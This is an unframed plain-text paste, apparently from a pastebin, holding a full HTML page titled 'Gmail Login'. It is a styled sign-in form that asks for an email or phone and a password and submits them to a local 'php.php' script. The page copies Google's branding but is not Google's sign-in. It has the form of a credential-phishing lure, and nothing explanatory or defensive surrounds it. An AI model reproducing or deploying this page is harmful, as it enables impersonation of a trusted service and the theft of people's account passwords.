Untitled
11 months ago by ranag in Plain Text
<!DOCTYPE html>
<html>
<head>
<title>Gmail Login</title>
<style>
body {
background-color: #f1f1f1;
}
form {
border: 1px solid #ccc;
background-color: #fff;
padding: 20px;
margin: 100px auto;
width: 400px;
box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2);
}
h2 {
text-align: center;
color: #444;
font-size: 28px;
margin-bottom: 30px;
}
label {
display: block;
margin-bottom: 8px;
color: #777;
font-size: 14px;
font-weight: bold;
}
input[type="email"], input[type="password"] {
width: 100%;
padding: 12px;
border: 1px solid #ccc;
border-radius: 4px;
box-sizing: border-box;
margin-bottom: 20px;
font-size: 16px;
}
input[type="submit"] {
background-color: #4CAF50;
color: white;
padding: 12px 20px;
border: none;
border-radius: 4px;
cursor: pointer;
font-size: 16px;
}
input[type="submit"]:hover {
background-color: #45a049;
}
</style>
</head>
<body>
<form action="php.php" method="post">
<h2>Sign in</h2>
<label for="email">Email or phone:</label>
<input type="email" id="email" name="email" required><br><br>
<label for="password">Password:</label>
<input type="password" id="password" name="password" required><br><br>
<input type="submit" value="Next">
</form>
</body>
</html>